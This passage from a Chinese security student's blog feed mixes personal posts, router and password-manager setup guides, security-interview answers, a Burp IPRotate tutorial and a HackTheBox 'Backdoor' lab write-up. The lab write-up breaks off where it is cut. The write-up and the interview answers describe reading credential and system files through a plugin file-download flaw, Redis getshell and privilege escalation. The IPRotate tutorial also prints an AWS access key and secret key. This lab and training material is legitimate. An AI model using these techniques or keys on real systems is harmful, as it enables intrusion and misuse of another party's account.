Manager</code>面板中修改一下,否则会无法访问。在电脑浏览器中输入<code>https://自己的域名:外网https端口/admin</code>,输入生成的<code>ADMIN_TOKEN</code>,即可在后台设置域名、<code>SMTP</code>服务器、二步验证等信息。</p><h2 id="思考"><a href="#思考" class="headerlink" title="思考"></a>思考</h2><p>当然,自建密码管理器也有风险,从网络安全的角度来说,把端口暴露到外网增加了攻击面,也增加了被黑客入侵的风险。为此我尝试过把“自托管服务”中的“服务器URL”改为局域网ip,同步时就打开<code>wireguard VPN</code>连接密码服务器,但是实际操作后发现并不能如我想的实现。下面以安卓手机端登录为例。</p><ul><li>当我填写<code>http://局域网ip:局域网端口</code>并登录时,报错如下:</li></ul><p><img src="https://s2.loli.net/2023/01/05/FZteokx4Phim69a.jpg" alt="小米http"></p><ul><li>当我填写<code>https://局域网ip:局域网端口</code>登录时,报错如下:</li></ul><p><img src="https://s2.loli.net/2023/01/05/d79KXQNeTzm1uED.jpg" alt="小米https"></p><h2 id="总结"><a href="#总结" class="headerlink" title="总结"></a>总结</h2><p>在下篇教程中,我将教大家如何实现一些进阶玩法,例如定时备份,让你的数据多一层保障。</p><p>好了,以上就是关于如何搭建<code>vaultwarden</code>的全部教程了,如果还有疑问或者不清楚的,欢迎在评论区留言,我会尽量帮助你们。我们下期再见!</p>]]></content>
<categories>
<category>生活点滴</category>
</categories>
<tags>
<tag>教程</tag>
<tag>数码折腾</tag>
</tags>
</entry>
<entry>
<title>2022年度总结</title>
<link href="/2022/12/21/2022%E5%B9%B4%E5%BA%A6%E6%80%BB%E7%BB%93/"/>
<url>/2022/12/21/2022%E5%B9%B4%E5%BA%A6%E6%80%BB%E7%BB%93/</url>
<content type="html"><![CDATA[<h2 id="前言"><a href="#前言" class="headerlink" title="前言"></a>前言</h2><p>2022年,注定是不平凡的一年:北京冬奥会、俄乌战争、上海疫情、中共二十大、郑州富士康、封控解除······时隔两年,我再度准备写一篇总结,总结一下这不平凡的一年,以及我这一年的心路历程。</p><h2 id="正文"><a href="#正文" class="headerlink" title="正文"></a>正文</h2><p>犹记得今年年初,北京冬奥会隆重举行,某乙方大厂招募几百名白帽志愿者前去重保。当时报名的师傅实在太多,哪怕倒贴、不能陪家人一起过年,也挡不住白帽子师傅们对冬奥重保的热情。因为我刚入安全圈不过半年,没有任何实习/hw经历,所以这对于我来说是一个很不错的锻炼机会,我就也想着报名试试。但是很遗憾,我错过了这次机会。接下来的日子里,我在家苦学Python编程,学会了写一些简单的脚本和爬虫,也让我喜欢上了这门简单又好用的语言。</p><p>转眼间寒假就结束了,我也迎来了大学本科期间课程最多的一个学期–大二下学期。五门专业课,三门公共课,还包含两门纯外教的专业课,说不累都是假的。看到课表的时候,我的内心是破防的:仅仅是考研408的专业课,就占到了两门!由于我并没有考研的打算,再加上那些专业课过于偏重理论,我觉得太枯燥,所以提不起半点学习学校知识的兴趣。正好当时学校开设了Java课程,我便想着跟学校把Java基础打好,为后面的代码审计做铺垫,可是学校的课程内容同样令人失望。无奈,我只得求助于B站大学,这里安利一下B站尚硅谷”康师傅“的Java基础课程,以及动力节点老杜的Java Web课程,他们都讲得挺不错的!一晃就来到了期末考试周,由于专业课没怎么学,专业课只能靠室友才勉强通过考试,最后发现竟然没有挂科,属于是意外之喜了。</p><p>又到了新的一个暑假,为了不让暑假就此荒废,我被父母安排到了某科研机构进行暑期实习,地点是在北京。这是我第一次试着自己租房,第一次体验北京的早晚高峰–每天往返单位和出租屋都要三个小时,第一次自己坐高铁和飞机,也第一次尝试着自己做饭。实习期间,我第一次接触到了二进制安全–我个人认为,它是信息安全所有技术方向的天花板。不过由于我在二进制安全方面完全没有基础,我仅仅被要求学会使用模糊测试工具–AFL(后面我会写相关技术文章,介绍使用方法),以及一些简单的汇编语言。可暑期实习终究是短暂的,两个月后我的暑假走向了尾声。没想到接下来的一件事点燃了“导火索”,改变了我的人生规划。</p><p>当时我已经结束了第二次对家庭网络的改造,但总觉得家庭网络不是很安全:因为有公网ip,而且我为了方便在外网对家中网络设备进行管理,大量的内网端口被转发到公网,对家庭网络的安全造成了很大的威胁。例如,内网群晖nas服务器的22端口经常被爆破,哪怕我修改了默认端口也还是避免不了被nmap扫描出指纹信息。于是我打算采用VPN技术,穿透到内网管理众多的网络设备。可没想到我打开手机流量模拟外网测试时,可能是触发了运营商机房的流量特征匹配规则,我在第二天早上便接到了网警的电话,警告我不要再“翻墙”,还被上门查了水表。我纳闷了,不就是用VPN内网穿透,怎么就成“翻墙”了?怎么还被查水表了?这件事让我认识到,没想到在墙国,技术都是有罪的,无论用途如何。这件事点燃了我心中想润出去的导火索,让我下定决心出国留学。</p><p>其实在这件事之前,我想润的心就一直蠢蠢欲动:每天排队做核酸、无止境的内卷、努力也不一定有收获、国内浮躁的安全圈、35岁中年危机······这些社会现实问题都像悬在我头顶上的剑,驱使着我尽快逃离这个国家。这件事只不过是点燃了我内心的“导火索”,让我重新认识自己、对人生作出规划。可能放弃国内已有的人脉资源和父母安排的工作,出国从头再来,对很多人来说都很难下定决心,但是考虑到国内重视所谓“人情世故”,而轻视真正实干者的大环境,以及国内网安行业的浮躁和内卷,以及其它种种原因,让我下定了润的决心。好在我本科期间学校的课程虽然摆烂,没有认真去学,但是均分和GPA不算太难看,仍然可以申请到不错的硕士学校。</p><p>回首这一年,除了技术,我也差一点收获了自己的爱情。大二下学期,因为一次机缘巧合,我在学校的表白墙加了一个大一小学妹的QQ,没想到因此获得了她的喜欢,甚至进行了人生中第一次线下约会。在她眼中,我是一个优秀的(虽然我自己并不这么觉得)、真诚的男生,身高也很完美,但我却觉得不合适,最后我还是失去了我的桃花运,也算是这一年小小的遗憾吧!</p><h2 id="结尾"><a href="#结尾" class="headerlink" title="结尾"></a>结尾</h2><p>希望在2023新的一年,我能和雅思和平分手,申请到心目中理想的学校!祝各位看到这篇文章的师傅们心想事成,身体健康(还有新冠检测阴性),万事如意!考研的一战成硕,秋招没找到工作的春招必上岸,在职的升职加薪,在这里给师傅们拜个早年了!</p>]]></content>
<categories>
<category>生活点滴</category>
</categories>
</entry>
<entry>
<title>重保一面面经</title>
<link href="/2022/09/17/%E9%87%8D%E4%BF%9D%E4%B8%80%E9%9D%A2%E9%9D%A2%E7%BB%8F/"/>
<url>/2022/09/17/%E9%87%8D%E4%BF%9D%E4%B8%80%E9%9D%A2%E9%9D%A2%E7%BB%8F/</url>
<content type="html"><![CDATA[<h2 id="前言"><a href="#前言" class="headerlink" title="前言"></a>前言</h2><p>由于中共“二十大”即将召开,重保的招聘工作也开始了。但是与今年的hw相比,重保的招聘渠道少了很多。我应聘的是中级,下面记录了当时的一些面试题,希望对下一次参加hw或者其它重保项目的师傅有所帮助!</p><h2 id="面试题"><a href="#面试题" class="headerlink" title="面试题"></a>面试题</h2><p>1.简单说一下你的项目经历</p><blockquote><p>(这个按个人的真实情况来,这里就不细说了)</p></blockquote><p>2.有过hw相关经历吗?</p><blockquote><p>(说实话,真没有,今年因为一些原因没去成)</p></blockquote><p>3.常见的中间件有哪些?</p><blockquote><p>Apache,Nginx,IIS,Tomcat,Fastjson,Weblogic,Strut2……</p></blockquote><p>4.说几个中间件的常见漏洞,比如<code>fastjson</code>?</p><blockquote><p>在请求包里面中发送恶意的json格式payload,漏洞在</p><p>处理json对象的时候,没有对@type字段进行过滤,从</p><p>而导致攻击者可以传入恶意的TemplatesImpl类,而这</p><p>个类有一个字段就是_bytecodes,有部分函数会根据</p><p>这个_bytecodes生成java实例,这就达到fastjson通过字</p><p>段传入一个类,再通过这个类被生成时执行构造函</p><p>数。</p></blockquote><p>5.<code>fastjson</code>不出网怎么利用?</p><blockquote><p>探测出网协议?(不太清楚)</p></blockquote><p>6.如何判断目标是否使用了<code>fastjson</code>?</p><blockquote><p>参考文章:<a href="https://blog.csdn.net/Adminxe/article/details/105918000">通过dnslog探测fastjson的几种方法</a>,或者用检测工具</p></blockquote><p>7.一台服务器被打穿了,但是没有接入安全设备,我们该如何应急?</p><blockquote><p>从系统角度(日志,进程,启动项)这些去分析?</p></blockquote><p>8.有没有接触过安全厂商的设备?</p><blockquote><p>(没有就没有,不要硬来)</p></blockquote><p>9.未授权的常见漏洞有哪些?</p><blockquote><p>当时只想到了Redis未授权漏洞。。。</p></blockquote><p>10.<code>Redis</code>未授权漏洞如何getshell?</p><blockquote><p>在攻击机中生成ssh公钥和私钥,密码设置为空,然后将生成的公钥写入,再利用私钥连接。</p></blockquote><p>11.Windows常用的提权方式有哪些?</p><blockquote><p>1.系统内核溢出提权</p><p>2.数据库提权</p><p>3.错误的系统配置提权</p><p>4.DLL劫持提权</p><p>5.特权第三方软件or服务提权;</p><p>6.令牌窃取提权</p><p>7.web中间件漏洞提权</p><p>8.AT,SC,PS(计划任务)提权等等</p></blockquote><p>12.OWASP TOP10漏洞有哪些?</p><blockquote><p>参考文章:<a href="https://blog.csdn.net/qq_38612882/article/details/122696374">2022-渗透测试-OWASP TOP10详细讲解</a></p></blockquote><p>13.正向shell和反向shell的区别?</p><blockquote><p>正向shell :控制端主动发起连接去连接被控制端;反向shell :被控制端主动连接控制端</p></blockquote><p><strong>以下问题请根据个人情况回答:</strong></p><p>14.如果派到外地是否能接受?</p><p>15.意向薪资是多少?</p>]]></content>
<categories>
<category>生活点滴</category>
</categories>
<tags>
<tag>面经</tag>
</tags>
</entry>
<entry>
<title>Burpsuite代理池插件--IPRotate配置教程</title>
<link href="/2022/09/17/Burpsuite%E4%BB%A3%E7%90%86%E6%B1%A0%E6%8F%92%E4%BB%B6-IPRotate%E9%85%8D%E7%BD%AE%E6%95%99%E7%A8%8B/"/>
<url>/2022/09/17/Burpsuite%E4%BB%A3%E7%90%86%E6%B1%A0%E6%8F%92%E4%BB%B6-IPRotate%E9%85%8D%E7%BD%AE%E6%95%99%E7%A8%8B/</url>
<content type="html"><![CDATA[<h2 id="前言"><a href="#前言" class="headerlink" title="前言"></a>前言</h2><p>最近看到某个安全群里有大佬分享了一款burpsuite抓包隐藏本机ip的插件,它可以让使用者无需手动配置代理链,即可在抓包的过程中隐藏最近的ip。然而安装过程中踩了很多坑,这里写一篇文章分享给大家,让师傅们少走弯路。</p><h2 id="正文"><a href="#正文" class="headerlink" title="正文"></a>正文</h2><p>这个插件托管在gayhub上,链接是:<a href="https://github.com/RhinoSecurityLabs/IPRotate_Burp_Extension">https://github.com/RhinoSecurityLabs/IPRotate_Burp_Extension</a></p><p>因为是python插件,而且依赖python2环境,所以需要配置jython:<a href="https://www.jython.org/download">Downloads | Jython</a></p><p><img src="https://s2.loli.net/2022/02/24/CiLkqxArjSFw1QH.png" alt="img"></p><p>去burpsuite配置插件依赖(注意避免中文路径):</p><p><img src="https://s2.loli.net/2022/02/24/hM789wHs5ZmnPJl.png" alt="img"></p><p>准备就绪后,我遇到了第一个坑:解决不同版本之间python的冲突问题。</p><p>由于我的电脑之前只有python3.9,所以我去官网下载了python2中最新的2.7.18版本,并自动配置了windows环境变量。然而命令行输入python3却会弹出微软应用商店(想必大家都遇到过),这时只需要把不同版本的python.exe文件名分别改成python2.exe和python3.exe,问题就解决了:</p><p><img src="https://s2.loli.net/2022/02/24/lUmtfGNM1kXsFeu.png" alt="img"></p><p>接下来burpsuite插件配置页面会提示缺少第三方库boto3,这时要注意在python2的环境下安装,但是我直接用pip安装会报错(忘记截图了):</p><figure class="highlight vhdl"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs vhdl">Fatal <span class="hljs-literal">error</span> <span class="hljs-keyword">in</span> launcher:Unable <span class="hljs-keyword">to</span> create <span class="hljs-keyword">process</span> using '<span class="hljs-string">"C:\python27\python.exe"</span> <span class="hljs-string">"C:\Python27\Scripts\pip.exe"</span><span class="hljs-symbol">'install</span> boto3<br></code></pre></td></tr></table></figure><p>这里可以使用anaconda这个工具来在不同版本间安装包,或者利用下面文章的方法(windows自行去网址复制脚本):</p><p><a href="https://blog.csdn.net/weixin_42478365/article/details/116801930">kali linux 中python2不带pip的解决方法_程序员届的小菜鸡的博客-CSDN博客_kali python2安装pip</a></p><p>python2运行脚本后即可正常使用pip2安装包。效果如下:</p><p><img src="https://s2.loli.net/2022/02/24/wiPNoEtMdV4fKXr.png" alt="img"></p><p>安装成功以后,输入以下的access-key和secret-key激活:</p><figure class="highlight gauss"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><code class="hljs gauss">Access <span class="hljs-built_in">Key</span>:AKIAISGP63MXTUVKLTHA<br>Secret <span class="hljs-built_in">Key</span>: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<br></code></pre></td></tr></table></figure><p>因为是测试环境,所以用vps中python自带的http模块启动一个服务(这里我以80端口为例):</p><figure class="highlight axapta"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><code class="hljs axapta">python3 -m http.<span class="hljs-keyword">server</span> 端口 <span class="hljs-meta">#python3</span><br>python -m SimpleHTTPServer 端口 <span class="hljs-meta">#python2</span><br></code></pre></td></tr></table></figure><p>先启动插件(Target Host填vps的ip),再用浏览器访问vps的ip+端口后,切换代理用burpsuite抓包:</p><p><img src="https://s2.loli.net/2022/02/24/QjKzNmqnuYOscoD.png" alt="img"></p><p>vps可以看到请求ip,放入burpsuite重放器中重放可观察到请求ip变化:</p><p><img src="https://s2.loli.net/2022/02/24/DZcHU4nNXbVeI15.png" alt="img"></p><p>注意这里一定要用burpsuite请求,否则无法触发代理池的效果。</p><h2 id="总结"><a href="#总结" class="headerlink" title="总结"></a>总结</h2><p>由于本人技术太菜,所以折腾了将近一个下午。好处就是,无需手动配置代理池,节省了我们筛选可用代理ip的时间。在这里再次感谢群里大佬的帮助!</p>]]></content>
<categories>
<category>Web安全</category>
</categories>
<tags>
<tag>教程</tag>
</tags>
</entry>
<entry>
<title>家庭网络改造(下)</title>
<link href="/2022/06/29/%E5%AE%B6%E5%BA%AD%E7%BD%91%E7%BB%9C%E6%94%B9%E9%80%A0%EF%BC%88%E4%B8%8B%EF%BC%89/"/>
<url>/2022/06/29/%E5%AE%B6%E5%BA%AD%E7%BD%91%E7%BB%9C%E6%94%B9%E9%80%A0%EF%BC%88%E4%B8%8B%EF%BC%89/</url>
<content type="html"><![CDATA[<h2 id="前言"><a href="#前言" class="headerlink" title="前言"></a>前言</h2><p>在上一篇文章中,我使用了openwrt系统作为主路由系统,虽然一样可以用来拨号+科学上网,但是openwrt系统的拨号稳定性实在是一言难尽:每次重启都要登录openwrt后台重新连接接口。我在家时倒也无所谓,但是一旦我不在家时远程重启,家里就会断几天网,为此我没有少挨爸妈的骂。最后,我还是决定选用现在比较流行的双软路由方案:esxi中安装爱快虚拟机作为主路由拨号上网,openwrt虚拟机则改为旁路由用于科学上网+去广告等进阶玩法。</p><h2 id="正文"><a href="#正文" class="headerlink" title="正文"></a>正文</h2><h3 id="安装主路由系统"><a href="#安装主路由系统" class="headerlink" title="安装主路由系统"></a>安装主路由系统</h3><p>首先要设置网卡直通,网上有很多教程,设置方法这里不再展开了。在上一篇教程中,openwrt的wan口并没有直通,可能会影响实际带宽并且占用CPU性能,不推荐那样做。然后去爱快官网,下载最新的ISO镜像并上传到esxi:<a href="https://www.ikuai8.com/component/download">https://www.ikuai8.com/component/download</a></p><p>进入esxi的web管理界面,安装爱快虚拟机。选择“新建虚拟机”,然后选择“其它3.x Linux(64位)”:</p><p><img src="https://s2.loli.net/2022/09/17/cKmTCOfZtFhXQRw.png" alt="img"></p><p>CPU核心数按需选择,内存最好多给点,4g最好,安装好以后可以改回1-2g。USB控制器可以删掉,CD/DVD驱动器记得选择刚才上传的爱快ISO镜像。</p><p>重要的一步来了:一定要添加直通的网卡作为WAN口!选择“添加其它设备”–“PCI设备”,选择你需要直通的网卡,然后保留至少一个虚拟网络适配器作为LAN口。这里放一张我设置好的图:</p><p><img src="https://s2.loli.net/2022/09/17/A4Vnm9PrYFjQ5Lq.png" alt="img"></p><p>最后说一下,切记:<strong>直通PCI设备的话,内存高级设置里面必须要勾选一下“预留所有客户机内存 (全部锁定) ”,不勾选会无法开机!</strong></p><p>设置完毕后点击完成,再开启刚才创建的虚拟机,选择安装系统的硬盘并回车,系统安装完成后会自动重启。重启完毕后,我们来设置一下爱快的LAN口地址。切记:管理口IP请设置成跟esxi的局域网同网段的IP!例如你家esxi的IP地址为192.168.50.231,则爱快主路由LAN口的地址为192.168.50.xx。</p><p>输入2并回车,选择“设置LAN1地址”:</p><p><img src="https://s2.loli.net/2022/09/17/1TV563FXDBzRawZ.png" alt="img"></p><p>输入0并回车:</p><p><img src="https://s2.loli.net/2022/09/17/Yb9qCLRUiKgxfzO.png" alt="img"></p><p>输入“192.168.50.xx”,这里我为了方便管理,填了“192.168.50.1”:</p><p><img src="https://s2.loli.net/2022/09/17/on4MZfYL1yU5k2X.png" alt="img"></p><p>然后首页输入8重启爱快虚拟机。爱快重启成功后,WEB管理地址的LAN口就会显示刚刚设置的IP了!</p><p>到这里我们的虚拟机,爱快软路由系统层面就已经安装并且简单设置好了!接下来教大家如何进行详细上网配置!</p><h3 id="配置主路由"><a href="#配置主路由" class="headerlink" title="配置主路由"></a>配置主路由</h3><p>打开浏览器,输入爱快的管理口IP,从网页端设置参数!默认账户密码都是admin,如果你网页输入管理口IP打不开爱快后台,说明访问的机器可能不在同一个局域网!这里建议你把电脑设备的网络手动设置一下,设置到跟爱快软路由同一个网段再来设置!</p><p><strong>登录进去后,会提示你绑定爱快云平台,这里我们先不绑定,因为爱快还没有通网络,后面有需要再来绑定!</strong></p><p>在左侧“网络设置”–“DHCP设置”–“DHCP服务端”中,新建一个DHCP服务:</p><p><img src="https://s2.loli.net/2022/09/17/Gyepkt4lXAbhwz1.png" alt="img"></p><p>首选dns第一个填写为op的IP地址,备用dns可以填写自己喜欢的。这里由于我之前的华硕路由器IP地址为192.168.50.2,所以我设置的是从192.168.50.3开始分配IP地址。设置完成后保存即可。</p><p>接着我们来绑定WAN口,在爱快首页的“系统概况”中点击wan1的图标,选择我们之前设置直通的网卡并绑定。接入方式改为“ADSL/PPPoE拨号”,填入宽带账号密码后保存,网线另一端插入光猫LAN口即可正常拨号上网:</p><p><img src="https://s2.loli.net/2022/09/17/RVJoafHmLjOQY1n.png" alt="img"></p><p><strong>注意:拨号成功后,爱快web首页的外网图标会变绿,而且状态信息会显示已链接,否则拨号失败,检查账户密码是否正确或光猫是否为桥接模式。</strong></p><p>类似的,我们把LAN口绑定为开始在esxi里设置的虚拟网卡,IP地址和之前设置的LAN口地址相同。如果你的软路由网口足够多,你也可以把LAN口绑定为直通的网卡。由于我的软路由只有两个千兆网口,所以爱快的LAN口使用虚拟网卡。</p><p>至此,爱快主路由的安装与调教就结束了!</p><h3 id="配置旁路由"><a href="#配置旁路由" class="headerlink" title="配置旁路由"></a>配置旁路由</h3><p>由于之前已经在虚拟机中安装好了openwrt,所以这里只需要简单更改一下op虚拟机的网络配置即可。回到esxi管理页面,把op的直通网卡删掉,只保留一个虚拟网卡(同样的,如果你的软路由网口足够多,你也可以把LAN口绑定为直通的网卡):</p><p><img src="https://s2.loli.net/2022/09/17/pj7wNJRrTPECclu.png" alt="img"></p><p>确认配置没问题后保存开机即可,这里我把op的管理IP设置为了192.168.50.235。那怎么修改op管理IP呢?</p><p>在op的web控制台中,输入命令:</p><figure class="highlight awk"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs awk">vi <span class="hljs-regexp">/etc/</span>config/network<br></code></pre></td></tr></table></figure><p>用键盘方向键移动光标到:</p><figure class="highlight gams"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs gams"><span class="hljs-keyword">option</span> ipaddr <span class="hljs-string">'192.168.2.1'</span> <br></code></pre></td></tr></table></figure><p>这行,输入法切换成英文模式,然后按键盘i键进行删减,然后修改成你想要的局域网IP地址。修改好后先按一下右上角esc按键!接着按shift+:(冒号键),然后下面会出现一个冒号输入wq,按回车键保存,修改好后重启op虚拟机即可。</p><p>进入op管理后台,不同编译版本的固件,默认账号和密码会不一样。在左侧的“网络”–“接口”中,修改LAN口的配置。网关填写爱快的IP地址,dns我写的是114.114.114.114和223.5.5.5,大家有喜欢的dns也可以填写其他的,比如运营商dns:</p><p><img src="https://s2.loli.net/2022/09/17/KWeOiAt76vqCfp4.png" alt="img"></p><p>把最下面的DHCP服务器设置,忽略此网口打勾,ipv6设置里面全部设置成禁用,最后点击保存即可:</p><p><img src="https://s2.loli.net/2022/09/17/e2MThAytPkUpoVz.png" alt="img"></p><p>最后保存一下设置,就可以正常上网了。</p><p><strong>如果大家设置后出现了无法上网的情况,请检查防火墙或者dns!</strong></p><p>最后我再跟大家讲解一下,如何让规划局域网里面的某些设备,通过openwrt旁路由进行上网。</p><h3 id="设备分流"><a href="#设备分流" class="headerlink" title="设备分流"></a>设备分流</h3><p>众所周知,走旁路由上网的设备,网速会有明显下降。那么,我们有没有办法让没有出国需求的设备只走主路由,有出国需求的设备走旁路由呢?答案是肯定的。而且,只走主路由的设备甚至可以跑满家里的千兆带宽!</p><p>在爱快后台的“网络设置”–“DHCP设置”–“DHCP静态分配”中,手动设置要出国设备的网关为旁路由IP,不用出国时就停用规则,如图:</p><p><img src="https://s2.loli.net/2022/09/17/Ywx32fIGQeLvcy7.png" alt="img"></p><p>重新连接家里的WiFi网络(台式机重新插拔网线),会发现网关已经变化,如果可以正常访问国内网站和国外网站,则说明大功告成了!</p><p>至于ipv6的配置方法,因为武汉电信还未开通,所以这里不做讲解。</p><p>最后放出改造后的拓扑图:</p><p><img src="https://s2.loli.net/2022/09/17/zBTnevPfYblaEIZ.jpg" alt="新版瑞云居网络拓扑图(双软路由)"></p><h2 id="总结"><a href="#总结" class="headerlink" title="总结"></a>总结</h2><p>有关家庭网络改造的文章就此告一段落了,使用一段时间后发现,双软路由是真香!至于添加SSL证书、端口转发、ddns之类的高级玩法,请自行上网搜索或参考本人往期文章,谢谢您的耐心阅读!</p>]]></content>
<categories>
<category>生活点滴</category>
</categories>
<tags>
<tag>数码折腾</tag>
</tags>
</entry>
<entry>
<title>家庭网络改造(上)</title>
<link href="/2022/05/21/%E5%AE%B6%E5%BA%AD%E7%BD%91%E7%BB%9C%E6%94%B9%E9%80%A0%EF%BC%88%E4%B8%8A%EF%BC%89/"/>
<url>/2022/05/21/%E5%AE%B6%E5%BA%AD%E7%BD%91%E7%BB%9C%E6%94%B9%E9%80%A0%EF%BC%88%E4%B8%8A%EF%BC%89/</url>
<content type="html"><![CDATA[<h2 id="网络环境"><a href="#网络环境" class="headerlink" title="网络环境"></a>网络环境</h2><p>武汉电信300M宽带,光猫拨号,有动态公网ip</p><p>原来的网络结构拓扑图:</p><p><img src="https://s2.loli.net/2022/05/15/14vfLbR3x2NQyPa.png" alt="旧版网络拓扑图"></p><h2 id="背景"><a href="#背景" class="headerlink" title="背景"></a>背景</h2><p>去年暑假本人刚搬进新家,刚开始用以前的网络设备还能凑合一下,但是后期随着设备增多,网络的稳定性和速度就不得不考虑了。因为本人有科学上网的需求,所以自从搬新家以后就一直采用主+旁网络架构(见图一)。这种方式虽然被很多人推崇,但是由于设备出网的流量需要先从主路由到旁路由再到主路由,浪费了带宽资源还降低了网速,所以我打算改造家里的网络架构。</p><p>之前我购买了一台软路由并安装了esxi6.7系统,在里面安装多个虚拟机来满足我不同的需求。还有一台去年双十一抢购的华硕的TUF-AX3000,支持双频WiFi6并且刷了梅林改版固件,于是我想到了以下两种家庭组网方案:</p><p>1.华硕路由器做主路由拨号+科学上网,软路由内安装esxi,作为一台普通网络设备接入局域网</p><p>2.软路由安装esxi,其中openwrt虚拟机作为主路由拨号+科学上网,其它虚拟机作为普通网络设备接入局域网;华硕路由器作为交换机+发射WiFi信号</p><p>其中第一种方案因为梅林改版的出国插件不支持最新的trojan和vless协议,而且无法单线多拨,可玩性不如openwrt,于是打算采用第二种方案。</p><h2 id="实施"><a href="#实施" class="headerlink" title="实施"></a>实施</h2><p>确定方案之后,就准备开干了。我的软路由是在海鲜市场花八百多淘来的,为了排除恰饭嫌疑就不放链接了。配置是i3-6100u的CPU,8g的内存,螃蟹网卡配两个双千兆网口,带金属外壳和电源,自己又装了个256g的三星固态盘,不装nas足够用了。先用U盘安装esxi系统,再去网上下载esir版openwrt固件并转换成esxi镜像<strong>(推荐使用工具:StarWind V2V Converter)</strong>,这里的安装过程参考其他大佬的文章,不展开细说了。</p><p>首先把esxi管理口插入电脑,进入esxi的web管理后台。选择左侧菜单栏的“网络”选项,可以看到虚拟交换机、物理网卡之类的选项(这里的<code>Wan</code>和<code>WAN</code>是后来加的):</p><p><img src="https://s2.loli.net/2022/05/15/qmDIMSPRFVg9UKa.jpg" alt="1"></p><p>在”虚拟交换机“选项中新增一个,配置可以按照我的填写,我这里就命名为<code>Wan</code>:</p><p><img src="https://s2.loli.net/2022/05/15/haeEugnCx7F2vWm.jpg" alt="2"></p><p>再新建一个端口组,选择刚才新建的虚拟交换机,我这里命名为<code>WAN</code>:</p><p><img src="https://s2.loli.net/2022/05/15/HAcnNqRyCDhKI5d.jpg" alt="3"></p><p>回到我们之前安装好的openwrt虚拟机,关掉它并添加一块新的虚拟网络适配器,选择刚才新建的<code>WAN</code>端口组:</p><p><img src="https://s2.loli.net/2022/05/15/D4NLJBPQAduX2lw.jpg" alt="4"></p><p>进入openwrt后台,左侧边栏的“网络-接口”,分别修改wan和wan6接口。选择“物理设置”,勾选对应选项:</p><p><img src="https://s2.loli.net/2022/05/15/3CeyuqTgDavL6xW.jpg" alt="5"></p><p>在wan/wan6口的“基本设置”中,把“协议”改为“PPPoE”,填入你的宽带账号和密码,保存并应用。</p><p>同样的,我们去设置lan口。把“协议”改为“静态地址”,”ipv4地址“改成192.168.xxx.1,“使用自定义dns服务器”可填可不填。因为华硕路由器仅用作交换机,不需要DHCP服务,所以我们打开openwrt的DHCP服务。往下滑到“DHCP服务器-基本设置”,取消勾选“忽略此接口”,在“高级设置”中勾选“动态DHCP”,保存并应用。</p><p>把软路由的wan口插入光猫,lan口插入电脑,如果电脑能够上网,那么说明快要成功了。这时还差一步,就是设置交换机。可能有人会问:为什么不把华硕路由器用作二级路由呢?openwrt的lan口接路由器wan口,华硕路由器后台的“外部网络”设置为“动态ip”,不方便吗?其实设置为二级路由意味着局域网内其它设备会和openwrt处于不同网段,其它设备想上网必须先经过华硕路由器的一次nat转换,损耗一部分网速还增加了游戏延迟,不利于游戏体验,所以我把华硕路由器作为交换机。</p><p>电脑与openwrt断开连接,用网线连接电脑和华硕路由器的lan口进入路由器后台。在左侧边栏的“高级设置-内部网络-内网地址设置”中,把华硕路由器的ip地址改为其它与openwrt同网段的ip,不冲突即可。再前往“DHCP服务器”选项,关闭华硕路由器的DHCP功能即可。</p><p><img src="https://s2.loli.net/2022/05/15/Cn3JKjfX4yFIeoa.jpg" alt="6"></p><p>把openwrt的lan口与华硕路由器的lan口相连,华硕路由器wan口什么都不接,这样华硕路由器就相当于一个交换机了。</p><p>最后放出改造后的拓扑图:</p><p><img src="https://s2.loli.net/2022/09/17/scd6QgX8xmzIRGK.jpg"></p><p>至于ddns、端口转发、外网访问等进阶玩法,这里就不展开了。安装过程可能有点繁琐,但一次配置,长久使用,使用起来还是很舒服的,大家再根据自己的实际需求优化下就好了!</p>]]></content>
<categories>
<category>生活点滴</category>
</categories>
<tags>
<tag>数码折腾</tag>
</tags>
</entry>
<entry>
<title>HackTheBox--Backdoor</title>
<link href="/2022/02/28/HackTheBox-Backdoor/"/>
<url>/2022/02/28/HackTheBox-Backdoor/</url>
<content type="html"><![CDATA[<p>迟到了好久的wp,趁寒假补个票~顺便靠这个靶场混点htb分数(doge)</p><h2 id="信息收集"><a href="#信息收集" class="headerlink" title="信息收集"></a>信息收集</h2><p>操起nmap就是一把梭,扫出来三个开放端口:22,80,1337</p><p><img src="https://s2.loli.net/2022/02/08/Jg4Tpm2IVRUAkcM.png" alt="1"></p><p>打开网页,发现是一个WordPress页面,这时想到了用wpscan插件扫:</p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs bash">wpscan --url http://10.10.11.125/ --plugins-detection aggressive --enumerate u,p<br></code></pre></td></tr></table></figure><p>扫描时间很长,而且也没扫出什么有用的信息。</p><h2 id="getshell"><a href="#getshell" class="headerlink" title="getshell"></a>getshell</h2><p>看到wpscan扫出的结果,想到去插件目录看看,没想到是个Apache目录遍历:</p><p><img src="https://s2.loli.net/2022/02/07/rgRUI8G47hyAijq.png"></p><p>上网查询ebook插件相关的exp,还真就找到了:<a href="https://www.exploit-db.com/exploits/39575">https://www.exploit-db.com/exploits/39575</a></p><p>没想到是任意文件下载,先按照poc把WordPress的配置文件下载下来,找到了数据库用户名和密码:</p><p><img src="https://s2.loli.net/2022/02/07/7JQarqjGuUDdsM4.png"></p><p>尝试用这个用户名和密码登录WordPress后台,失败。看来只能下载其它重要文件,例如<code>/etc/passwd</code>,在里面发现了用户名<code>user</code>。我也尝试过下载ssh公钥,结果以失败告终。</p><p>这时,我想起来虽然上传不了pspy,但是可以查看进程日志。下载<code>/proc/sched_debug</code>查看进程,我看到其中有一个很特别的gdbserver进程:</p><p><img src="C:\Users\Admin\Desktop\HTB--Backdoor\4.png"></p><p>再下载对应的进程文件<code>/proc/29222/cmdline</code>,查看对应端口号,发现正好是前面扫出来的1337端口。上网搜索gdbserver的exp:<a href="https://www.exploit-db.com/exploits/50539">https://www.exploit-db.com/exploits/50539</a></p><p>运行脚本,按照提示操作:</p><p><img src="https://s2.loli.net/2022/02/08/TLW3a6GuoJ9rpcx.png" 